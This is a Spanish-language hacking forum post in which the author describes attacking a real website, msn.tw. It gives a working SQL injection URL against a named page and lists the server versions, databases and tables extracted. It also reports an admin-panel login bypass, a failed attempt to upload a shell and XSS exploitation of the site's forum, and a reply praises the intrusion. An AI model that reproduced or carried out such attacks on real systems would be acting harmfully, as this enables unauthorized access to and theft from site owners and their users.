Underc0de

Bueno, por hay con un bro de ddlr nos pusimos a intentar el ingreso a MSN.TW de la cual es ironico que tenga un directorio tan mugre y a la vez usando PHP y MYSQL , sin embargo decidimos explorar mas debido a que es muy llamativo todo este escenario.
Msn.tw



Iniciamos asi:
http://www.msn.tw/softball/gamedetail.php?gameseq=218+and+1=0+union+select+version%28%29,1,2,3,4,5,6,7,8,9,10,11--  (http://www.msn.tw/softball/gamedetail.php?gameseq=218+and+1=0+union+select+version%28%29,1,2,3,4,5,6,7,8,9,10,11--)


De hay comenzamos a sacar la data...
Info basica

Apache
PHP/5.2.13
PleskLin
MySQL >=5
5.0.90

Dbs's:

information_schema
msn
test

Db Principal:

accesslog
album
board
forum
game
lotto_539
mem
open_account
open_article
open_article_content
open_article_content_d
open_board
open_collect
open_keyword
open_tracking
open_violate
photo
record
record_2005
record_2006
record_2007
record_2009
record_2010
record_2011
record_2012
redir_conf
reserve
static
static_2005
static_2006
static_2007
static_2009
static_2010
static_2011
static_2012
team
user
webcont
-----------------------------------------------------------------------------------
Despues de realizar todo esto dieron ganas de subir shell, pero no logre el objetivo, intente en paneles loguearme y logre pero nada interesante aunqu cabe aclarar que no era necesario sacar user debido a que el panel tenia bypasse.. el Uploader no servia de mucho que digamos.

PANEL CON BYPASSE


Aburrido solo me puse a explotar XSS en el foro...
http://www.msn.tw/softball/forum.php (http://www.msn.tw/softball/forum.php)



Apoyo
---------------------------------
Black-Mantic Blaron , 5TU4RT

Si lo había visto en tu blog... todo un atacante xD aunque lo veo no creo como msn puede tener una web asi...


Saludos,
Dedalo